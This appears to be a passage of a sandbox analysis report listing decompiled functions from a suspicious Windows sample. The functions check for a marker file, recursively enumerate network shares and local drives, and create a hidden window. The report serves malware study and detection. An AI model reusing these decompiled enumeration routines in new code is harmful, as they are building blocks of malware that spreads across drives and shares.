Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040C500(void* __ecx, void* __edx) {
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t4;
				void* _t10;
				void* _t19;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t27;

				_t21 = __edx;
				_t4 =  &_v264;
				_t19 = __ecx;
				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
				if(_t4 >= 0) {
					PathAppendA( &_v264, "bowsakkdestx.txt");
					_t27 = E004220B6( &_v264, "r");
					__eflags = _t27;
					if(__eflags != 0) {
						_push(_t22);
						_push(2);
						_push(0);
						_push(_t27);
						E0042387F(_t19, _t21, _t22, _t27, __eflags);
						_push(_t27);
						_t10 = E00423455(_t19, _t21, _t22, _t27, __eflags);
						_push(_t27);
						_t23 = _t10;
						E00420CF4(_t19, _t21, _t23, _t27, __eflags);
						__eflags = _t23;
						if(__eflags == 0) {
							L7:
							_push(_t27);
							E00423A38(_t19, _t23, _t27, __eflags);
							__eflags = 0;
							return 0;
						} else {
							__eflags = _t23 - 0x400;
							if(__eflags > 0) {
								goto L7;
							} else {
								E004222F5(_t19, 1, _t23, _t27);
								_push(_t27);
								E00423A38(_t19, _t23, _t27, __eflags);
								return 1;
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
			}

0x0040c500
0x0040c509
0x0040c519
0x0040c51b
0x0040c523
0x0040c539
0x0040c550
0x0040c555
0x0040c557
0x0040c561
0x0040c562
0x0040c564
0x0040c566
0x0040c567
0x0040c56c
0x0040c56d
0x0040c572
0x0040c573
0x0040c575
0x0040c57d
0x0040c57f
0x0040c5a5
0x0040c5a5
0x0040c5a6
0x0040c5ae
0x0040c5b6
0x0040c581
0x0040c581
0x0040c587
0x00000000
0x0040c589
0x0040c58e
0x0040c593
0x0040c594
0x0040c5a4
0x0040c5a4
0x0040c587
0x0040c559
0x0040c55a
0x0040c560
0x0040c560
0x0040c525
0x0040c52b
0x0040c52b

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539

Strings

bowsakkdestx.txt, xrefs: 0040C52D

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BA80(struct HINSTANCE__* __ecx) {
				struct HWND__* _t1;
				struct HWND__* _t6;

				 *0x513244 = __ecx;
				_t1 = CreateWindowExW(0, L"LPCWSTRszWindowClass", L"LPCWSTRszTitle", 0xcf0000, 0x80000000, 0, 0x80000000, 0, 0, 0, __ecx, 0);
				_t6 = _t1;
				if(_t6 != 0) {
					ShowWindow(_t6, 0);
					UpdateWindow(_t6);
					 *0x51323c = _t6;
					return 1;
				} else {
					return _t1;
				}
			}

0x0041baa7
0x0041baad
0x0041bab3
0x0041bab7
0x0041babe
0x0041bac5
0x0041bacb
0x0041bad7
0x0041baba
0x0041baba
0x0041baba

APIs

CreateWindowExW.USER32 ref: 0041BAAD
ShowWindow.USER32(00000000,00000000), ref: 0041BABE
UpdateWindow.USER32(00000000), ref: 0041BAC5

Strings

LPCWSTRszWindowClass, xrefs: 0041BAA0
LPCWSTRszTitle, xrefs: 0041BA9B

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Window$CreateShowUpdate
String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
API String ID: 2944774295-3503800400
Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C

Uniqueness

Uniqueness Score: -1.00%

Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234
sharememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00410BD0(struct _NETRESOURCE* __ecx, intOrPtr* __edx) {
				char _v8;
				signed int _v16;
				intOrPtr _v24;
				signed int _v28;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v92;
				intOrPtr _v96;
				int _v100;
				char _v116;
				signed int _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				void* _v144;
				struct _NETRESOURCE* _v148;
				signed int _v152;
				void* _v156;
				int _v160;
				int _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t88;
				signed int _t89;
				signed int _t91;
				intOrPtr _t103;
				void* _t107;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				void* _t122;
				signed int _t124;
				signed int _t127;
				struct _NETRESOURCE* _t129;
				signed int _t131;
				signed int _t135;
				signed int _t136;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t151;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t161;
				intOrPtr* _t164;
				signed int _t167;
				signed int _t168;
				void* _t169;

				_t129 = __ecx;
				_t168 = _t167 & 0xfffffff8;
				_push(0xffffffff);
				_push(0x4cabd6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t168;
				_t169 = _t168 - 0x98;
				_v164 = 0x4000;
				_t164 = __edx;
				_v160 = 0xffffffff;
				if(WNetOpenEnumW(2, 0, 0, __ecx,  &_v156) == 0) {
					_t122 = GlobalAlloc(0x40, _v164);
					_v144 = _t122;
					while(1) {
						E0042B420(_t122, 0, _v164);
						_t169 = _t169 + 0xc;
						_t88 = WNetEnumResourceW(_v156,  &_v160, _t122,  &_v164);
						__eflags = _t88;
						if(_t88 != 0) {
							break;
						}
						_v148 = _t88;
						__eflags = _v160 - _t88;
						if(_v160 > _t88) {
							_t124 = _t122 + 0x10;
							__eflags = _t124;
							_v152 = _t124;
							do {
								_v96 = 7;
								_v100 = 0;
								_v116 = 0;
								_v72 = 7;
								_v76 = 0;
								_v92 = 0;
								_v48 = 7;
								_v52 = 0;
								_v68 = 0;
								_v24 = 7;
								_v28 = 0;
								_v44 = 0;
								_v8 = 0;
								_t151 =  *_t124;
								_v132 =  *((intOrPtr*)(_t124 - 0x10));
								_v128 =  *((intOrPtr*)(_t124 - 0xc));
								_v124 =  *((intOrPtr*)(_t124 - 8));
								_v120 =  *(_t124 - 4);
								__eflags = _t151;
								if(_t151 != 0) {
									__eflags =  *_t151;
									if( *_t151 != 0) {
										_t146 = _t151;
										_t161 = _t146 + 2;
										do {
											_t118 =  *_t146;
											_t146 = _t146 + 2;
											__eflags = _t118;
										} while (_t118 != 0);
										_t147 = _t146 - _t161;
										__eflags = _t147;
										_t148 = _t147 >> 1;
									} else {
										_t148 = 0;
									}
									_push(_t148);
									_t129 =  &_v116;
									E00415C10(_t124, _t129, _t161, _t164, _t151);
								}
								_t152 =  *(_t124 + 4);
								__eflags = _t152;
								if(_t152 != 0) {
									__eflags =  *_t152;
									if( *_t152 != 0) {
										_t143 = _t152;
										_t38 = _t143 + 2; // 0x72
										_t161 = _t38;
										do {
											_t116 =  *_t143;
											_t143 = _t143 + 2;
											__eflags = _t116;
										} while (_t116 != 0);
										_t144 = _t143 - _t161;
										__eflags = _t144;
										_t145 = _t144 >> 1;
									} else {
										_t145 = 0;
									}
									_push(_t145);
									_t129 =  &_v92;
									E00415C10(_t124, _t129, _t161, _t164, _t152);
								}
								_t153 =  *(_t124 + 8);
								__eflags = _t153;
								if(_t153 != 0) {
									__eflags =  *_t153;
									if( *_t153 != 0) {
										_t140 = _t153;
										_t161 = _t140 + 2;
										do {
											_t114 =  *_t140;
											_t140 = _t140 + 2;
											__eflags = _t114;
										} while (_t114 != 0);
										_t141 = _t140 - _t161;
										__eflags = _t141;
										_t142 = _t141 >> 1;
									} else {
										_t142 = 0;
									}
									_push(_t142);
									_t129 =  &_v68;
									E00415C10(_t124, _t129, _t161, _t164, _t153);
								}
								_t154 =  *(_t124 + 0xc);
								__eflags = _t154;
								if(_t154 != 0) {
									__eflags =  *_t154;
									if( *_t154 != 0) {
										_t110 = _t154;
										_t161 = _t110 + 2;
										do {
											_t139 =  *_t110;
											_t110 = _t110 + 2;
											__eflags = _t139;
										} while (_t139 != 0);
										_t111 = _t110 - _t161;
										__eflags = _t111;
										_t112 = _t111 >> 1;
									} else {
										_t112 = 0;
									}
									_push(_t112);
									_t129 =  &_v44;
									E00415C10(_t124, _t129, _t161, _t164, _t154);
								}
								_t161 =  *(_t164 + 4);
								__eflags =  &_v132 - _t161;
								if( &_v132 >= _t161) {
									L41:
									__eflags = _t161 -  *((intOrPtr*)(_t164 + 8));
									if(_t161 ==  *((intOrPtr*)(_t164 + 8))) {
										_push(_t129);
										E004150C0(_t124, _t164, _t161, _t164);
									}
									_t131 =  *(_t164 + 4);
									_v140 = _t131;
									_v136 = _t131;
									_v8 = 2;
									__eflags = _t131;
									if(__eflags != 0) {
										E00418FD0(_t131, __eflags,  &_v132);
									}
								} else {
									_t103 =  *_t164;
									_t129 =  &_v132;
									__eflags = _t103 - _t129;
									if(_t103 > _t129) {
										goto L41;
									} else {
										_t135 = _t129 - _t103;
										_t127 = ((0x92492493 * _t135 >> 0x20) + _t135 >> 6 >> 0x1f) + ((0x92492493 * _t135 >> 0x20) + _t135 >> 6);
										__eflags = _t161 -  *((intOrPtr*)(_t164 + 8));
										if(_t161 ==  *((intOrPtr*)(_t164 + 8))) {
											_push(_t135);
											E004150C0(_t127, _t164, _t161, _t164);
										}
										_t136 =  *(_t164 + 4);
										_v136 = _t136;
										_v140 = _t136;
										_t107 = _t127 * 0x70 +  *_t164;
										_v8 = 1;
										__eflags = _t136;
										if(__eflags != 0) {
											E00418FD0(_t136, __eflags, _t107);
										}
										_t124 = _v152;
									}
								}
								_v8 = 0;
								 *(_t164 + 4) =  *(_t164 + 4) + 0x70;
								__eflags =  *(_t124 - 4) & 0x00000002;
								if(( *(_t124 - 4) & 0x00000002) != 0) {
									_t71 = _t124 - 0x10; // -16
									E00410BD0(_t71, _t164);
								}
								_v8 = 0xffffffff;
								E00410F20( &_v132);
								_t124 = _t124 + 0x20;
								_t129 = _v148 + 1;
								_v152 = _t124;
								_v148 = _t129;
								__eflags = _t129 - _v160;
							} while (_t129 < _v160);
							_t122 = _v144;
						}
					}
					_t89 = WNetCloseEnum(_v156);
					asm("sbb eax, eax");
					 *[fs:0x0] = _v16;
					_t91 =  ~_t89 + 1;
					__eflags = _t91;
					return _t91;
				} else {
					 *[fs:0x0] = _v16;
					return 0;
				}
			}

0x00410bd0
0x00410bd3
0x00410bd6
0x00410bd8
0x00410be3
0x00410be4
0x00410beb
0x00410bf8
0x00410c08
0x00410c0a
0x00410c1a
0x00410c3f
0x00410c41
0x00410c45
0x00410c4c
0x00410c51
0x00410c63
0x00410c69
0x00410c6b
0x00000000
0x00000000
0x00410c71
0x00410c75
0x00410c79
0x00410c7b
0x00410c7b
0x00410c7e
0x00410c82
0x00410c84
0x00410c8c
0x00410c94
0x00410c99
0x00410ca1
0x00410ca5
0x00410caa
0x00410cb5
0x00410cbc
0x00410cc1
0x00410ccc
0x00410cd3
0x00410cdb
0x00410ce5
0x00410ce7
0x00410cee
0x00410cf5
0x00410cfc
0x00410d00
0x00410d02
0x00410d04
0x00410d08
0x00410d0e
0x00410d10
0x00410d13
0x00410d13
0x00410d16
0x00410d19
0x00410d19
0x00410d1e
0x00410d1e
0x00410d20
0x00410d0a
0x00410d0a
0x00410d0a
0x00410d22
0x00410d24
0x00410d28
0x00410d28
0x00410d2d
0x00410d30
0x00410d32
0x00410d34
0x00410d38
0x00410d3e
0x00410d40
0x00410d40
0x00410d43
0x00410d43
0x00410d46
0x00410d49
0x00410d49
0x00410d4e
0x00410d4e
0x00410d50
0x00410d3a
0x00410d3a
0x00410d3a
0x00410d52
0x00410d54
0x00410d58
0x00410d58
0x00410d5d
0x00410d60
0x00410d62
0x00410d64
0x00410d68
0x00410d6e
0x00410d70
0x00410d73
0x00410d73
0x00410d76
0x00410d79
0x00410d79
0x00410d7e
0x00410d7e
0x00410d80
0x00410d6a
0x00410d6a
0x00410d6a
0x00410d82
0x00410d84
0x00410d88
0x00410d88
0x00410d8d
0x00410d90
0x00410d92
0x00410d94
0x00410d98
0x00410d9e
0x00410da0
0x00410da3
0x00410da3
0x00410da6
0x00410da9
0x00410da9
0x00410dae
0x00410dae
0x00410db0
0x00410d9a
0x00410d9a
0x00410d9a
0x00410db2
0x00410db4
0x00410dbb
0x00410dbb
0x00410dc0
0x00410dc7
0x00410dc9
0x00410e1f
0x00410e1f
0x00410e22
0x00410e24
0x00410e27
0x00410e27
0x00410e2c
0x00410e2f
0x00410e33
0x00410e37
0x00410e3f
0x00410e41
0x00410e48
0x00410e48
0x00410dcb
0x00410dcb
0x00410dcd
0x00410dd1
0x00410dd3
0x00000000
0x00410dd5
0x00410dd5
0x00410de8
0x00410dea
0x00410ded
0x00410def
0x00410df2
0x00410df2
0x00410df7
0x00410dfd
0x00410e01
0x00410e05
0x00410e07
0x00410e0f
0x00410e11
0x00410e14
0x00410e14
0x00410e19
0x00410e19
0x00410dd3
0x00410e4d
0x00410e55
0x00410e59
0x00410e60
0x00410e64
0x00410e67
0x00410e67
0x00410e70
0x00410e7b
0x00410e84
0x00410e87
0x00410e88
0x00410e8c
0x00410e90
0x00410e90
0x00410e9a
0x00410e9a
0x00410c79
0x00410ea7
0x00410eb7
0x00410eb9
0x00410ec1
0x00410ec1
0x00410ec6
0x00410c1c
0x00410c25
0x00410c32
0x00410c32

APIs

WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
_memset.LIBCMT ref: 00410C4C
WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Enum$AllocGlobalOpenResource_memset
String ID:
API String ID: 364255426-0
Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00410A50(char __ecx) {
				signed int _v16;
				char _v28;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v76;
				unsigned int _v80;
				char _v84;
				unsigned int _v88;
				char _v89;
				intOrPtr _v96;
				intOrPtr _v101;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t35;
				int _t39;
				int _t40;
				int _t45;
				void* _t48;
				signed int _t52;
				char* _t63;
				signed int _t74;
				signed int _t75;
				void* _t76;
				char* _t77;

				_t75 = _t74 & 0xfffffff8;
				_push(0xffffffff);
				_push(0x4cab90);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t75;
				_t76 = _t75 - 0x48;
				_push(_t72);
				_push(_t70);
				_v76 = __ecx;
				_t35 = GetLogicalDrives();
				_v80 = _t35;
				_t52 = 0;
				do {
					if((_t35 >> _t52 & 0x00000001) == 0) {
						goto L11;
					}
					_push(1);
					_v48 = 0xf;
					_v52 = 0;
					_v68 = 0;
					E004156D0(_t52,  &_v68, _t70, " ");
					_v16 = 0;
					_t10 = _t52 + 0x41; // 0x41
					_push(2);
					_t59 =  >=  ? _v76 :  &_v76;
					 *( >=  ? _v76 :  &_v76) = _t10;
					E00413EA0(_t52,  &_v76, _t70, _t72, ":\\");
					_t39 = SetErrorMode(1);
					_t70 = _t39;
					_t62 =  >=  ? _v84 :  &_v84;
					_t40 = PathFileExistsA( >=  ? _v84 :  &_v84);
					_t72 = _t40;
					SetErrorMode(_t39);
					if(_t40 != 0) {
						_t44 =  >=  ? _v76 :  &_v76;
						_t45 = GetDriveTypeA( >=  ? _v76 :  &_v76);
						if(_t45 >= 2 && (_t45 <= 4 || _t45 == 6)) {
							_t77 = _t76 - 0x18;
							_v89 = 0;
							_t63 = _t77;
							_push(0xffffffff);
							_push(0);
							 *((intOrPtr*)(_t63 + 0x14)) = 0xf;
							 *((intOrPtr*)(_t63 + 0x10)) = 0;
							 *_t63 = 0;
							E00413FF0(_t52, _t63,  &_v76);
							_t48 = E00412900( &_v64, _v101);
							_t76 = _t77 + 0x18;
							_v28 = 1;
							E00413580(_t52, _v96, _t48);
							if(_v48 >= 8) {
								L00422587(_v60);
								_t76 = _t76 + 4;
							}
						}
					}
					_v16 = 0xffffffff;
					if(_v56 >= 0x10) {
						L00422587(_v76);
						_t76 = _t76 + 4;
					}
					_t35 = _v88;
					L11:
					_t52 = _t52 + 1;
				} while (_t52 < 0x1a);
				 *[fs:0x0] = _v16;
				return _t35;
			}

0x00410a53
0x00410a56
0x00410a58
0x00410a63
0x00410a64
0x00410a6b
0x00410a6f
0x00410a70
0x00410a71
0x00410a75
0x00410a7b
0x00410a7f
0x00410a81
0x00410a8a
0x00000000
0x00000000
0x00410a90
0x00410a9b
0x00410aa3
0x00410aab
0x00410ab0
0x00410ab5
0x00410ac6
0x00410ac9
0x00410acb
0x00410ad5
0x00410adb
0x00410ae2
0x00410af1
0x00410af3
0x00410af9
0x00410b00
0x00410b02
0x00410b0a
0x00410b15
0x00410b1b
0x00410b24
0x00410b30
0x00410b33
0x00410b38
0x00410b3e
0x00410b40
0x00410b42
0x00410b49
0x00410b51
0x00410b54
0x00410b61
0x00410b66
0x00410b6e
0x00410b73
0x00410b7d
0x00410b83
0x00410b88
0x00410b88
0x00410b7d
0x00410b24
0x00410b8b
0x00410b98
0x00410b9e
0x00410ba3
0x00410ba3
0x00410ba6
0x00410baa
0x00410baa
0x00410bab
0x00410bba
0x00410bc5

APIs

GetLogicalDrives.KERNEL32 ref: 00410A75
SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
PathFileExistsA.SHLWAPI(?), ref: 00410AF9
SetErrorMode.KERNEL32(00000000), ref: 00410B02
GetDriveTypeA.KERNEL32(?), ref: 00410B1B

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
String ID:
API String ID: 2560635915-0
Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97

Uniqueness

Uniqueness Score: -1.00%

Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E0043B6FF(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x510440, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x510ab0 - _t7;
								if(__eflags == 0) {
									_t9 = E00425208(__eflags);
									 *_t9 = E00425261(GetLastError());
									goto L17;
								} else {
									__eflags = E0042793D(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E00425208(__eflags);
										 *_t12 = E00425261(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0042793D(_t6, _t31);
						 *((intOrPtr*)(E00425208(__eflags))) = 0xc;
						goto L12;
					} else {
						E00420BED(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00420C62(__ebx, __edx, __edi, _a8);
				}
			}

0x0043b706
0x0043b714
0x0043b717
0x0043b719
0x0043b728
0x0043b75b
0x0043b75b
0x0043b75e
0x00000000
0x00000000
0x0043b72b
0x0043b72d
0x0043b72f
0x0043b72f
0x0043b72f
0x0043b73c
0x0043b742
0x0043b744
0x0043b746
0x0043b7a6
0x0043b7a6
0x0043b748
0x0043b748
0x0043b74e
0x0043b790
0x0043b7a4
0x00000000
0x0043b750
0x0043b757
0x0043b759
0x0043b778
0x0043b78c
0x0043b772
0x0043b772
0x0043b772
0x00000000
0x00000000
0x00000000
0x0043b759
0x0043b74e
0x00000000
0x0043b774
0x0043b761
0x0043b76c
0x00000000
0x0043b71b
0x0043b71e
0x0043b724
0x0043b724
0x0043b775
0x0043b777
0x0043b708
0x0043b712
0x0043b712

APIs

_malloc.LIBCMT ref: 0043B70B

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00820000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_free.LIBCMT ref: 0043B71E

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC

Uniqueness

Uniqueness Score: -1.00%

Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041F070() {
				struct tagMSG _v32;
				long _t7;

				PostThreadMessageW( *0x51325c, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t7 = WaitForSingleObject( *0x513260, 0xa);
				} while (_t7 == 0x102);
				 *0x513260 = 0;
				 *0x51325c = 0;
				return _t7;
			}

0x0041f085
0x0041f0a0
0x0041f0b0
0x0041f0b6
0x0041f0c6
0x0041f0d2
0x0041f0d4
0x0041f0dd
0x0041f0e7
0x0041f0f5

APIs

PostThreadMessageW.USER32 ref: 0041F085
PeekMessageW.USER32 ref: 0041F0AC
DispatchMessageW.USER32 ref: 0041F0B6
PeekMessageW.USER32 ref: 0041F0C4
WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49
windowsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E500() {
				struct tagMSG _v32;
				long _t7;

				PostThreadMessageW( *0x513258, 0x12, 0, 0);
				do {
					while(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						DispatchMessageW( &_v32);
					}
					_t7 = WaitForSingleObject( *0x513254, 0xa);
				} while (_t7 == 0x102);
				 *0x513254 = 0;
				 *0x513258 = 0;
				return _t7;
			}

0x0041e515
0x0041e530
0x0041e540
0x0041e546
0x0041e556
0x0041e562
0x0041e564
0x0041e56d
0x0041e577
0x0041e585

APIs

PostThreadMessageW.USER32 ref: 0041E515
PeekMessageW.USER32 ref: 0041E53C
DispatchMessageW.USER32 ref: 0041E546
PeekMessageW.USER32 ref: 0041E554
WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041FA40 Relevance: 7.5, APIs: 5, Instructions: 48
windowsynchronizationthreadCOMMON

